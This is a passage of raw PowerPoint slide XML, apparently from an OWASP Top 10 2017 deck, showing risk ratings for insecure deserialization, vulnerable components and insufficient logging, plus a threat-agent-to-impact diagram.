                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>EASY</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="9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baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>WIDESPREAD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baseline="0"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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>EASY</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="9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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>MODERATE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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>6.0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7"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="362958">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A8:2017-Insecure Deserialization</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rgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>DIFFICULT</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Wingdings"/>
                        <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:sym typeface="Wingdings"/>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lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>COMMON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baseline="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rgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>AVERAGE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rgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>SEVERE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>5.0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8"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="362958">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>A9:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Vulnerable</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Components</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>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rgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>AVERAGE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baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>WIDESPREAD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baseline="0"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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>AVERAGE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rgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>MODERATE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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>4.7</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9"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="362958">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>A10:2017-I</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>nsufficient</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" kern="1200" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Logging</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" baseline="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>&amp;Monitoring</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>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algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>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rgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>AVERAGE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baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>WIDESPREAD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baseline="0"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900" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>DIFFICULT</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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900" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>MODERATE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9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algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>4.0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10"/>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776298178"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="6553200"/>
          <a:ext cx="6858000" cy="25908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59606">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Additional Risks to Consider</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial"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22311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aseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>The Top 10 covers a lot of ground, but there are many other risks you should consider and evaluate in your organization. Some of these have appeared in previous versions of the Top 10, and others have not, including new attack techniques that are being identified all the time.  Other important application security risks (in alphabetical order) that you should additionally consider include</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>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baseline="0" dirty="0">
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial"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0" name="Rectangle 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819400" y="2627763"/>
            <a:ext cx="995283" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Prevalence</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3897232" y="2627763"/>
            <a:ext cx="903369" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Detectability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1759009" y="2627763"/>
            <a:ext cx="956796" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploitability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4952356" y="2627763"/>
            <a:ext cx="869908" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Technical</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="Group 35"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1219200" y="2262187"/>
            <a:ext cx="4887049" cy="533401"/>
            <a:chOff x="430949" y="1049627"/>
            <a:chExt cx="5604445" cy="596141"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Rectangle 116"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2991920"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216000" rIns="36000" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Security</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Weakness</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="40" name="Group 63"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="586847" y="1072156"/>
              <a:ext cx="139702" cy="304799"/>
              <a:chOff x="324" y="1497"/>
              <a:chExt cx="288" cy="624"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="49" name="Oval 64"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="372" y="1497"/>
                <a:ext cx="192" cy="192"/>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a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50" name="Line 65"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="468" y="1689"/>
                <a:ext cx="0" cy="240"/>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51" name="Line 66"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="324" y="1929"/>
                <a:ext cx="144" cy="192"/>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52" name="Line 67"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="468" y="1929"/>
                <a:ext cx="144" cy="192"/>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53" name="Line 68"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="324" y="1785"/>
                <a:ext cx="288" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" sz="900" b="1"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41"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r>
                <a:rPr lang="en-US" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Attack</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Vectors</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="AutoShape 85"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5411940" y="1049627"/>
              <a:ext cx="623454" cy="428655"/>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18000" rIns="18000" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Impacts</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="43" name="AutoShape 108"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="829115" y="1262418"/>
              <a:ext cx="441766" cy="123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45" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="39" idx="3"/>
              <a:endCxn id="42" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4012288" y="1263955"/>
              <a:ext cx="1399652" cy="42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sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="430949" y="1348251"/>
              <a:ext cx="572938" cy="297517"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="36000" rIns="36000">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Threat</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Agents</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="44" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:endCxn id="39" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2188570" y="1263652"/>
              <a:ext cx="803350" cy="725"/>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7" name="AutoShape 117"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3457584" y="2283884"/>
            <a:ext cx="192106" cy="340902"/>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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5791200" y="2627763"/>
            <a:ext cx="718782" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Business</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Textplatzhalter 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
